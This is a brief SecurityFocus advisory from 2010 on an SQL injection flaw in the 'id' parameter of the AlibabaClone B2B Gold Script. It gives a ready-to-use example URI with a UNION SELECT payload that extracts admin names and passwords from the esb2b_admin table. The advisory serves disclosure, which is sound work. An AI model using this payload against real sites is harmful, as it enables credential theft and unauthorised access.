AlibabaClone B2B Gold Script 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[path]/product.html?id=-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--


 

Privacy Statement
Copyright 2010, SecurityFocus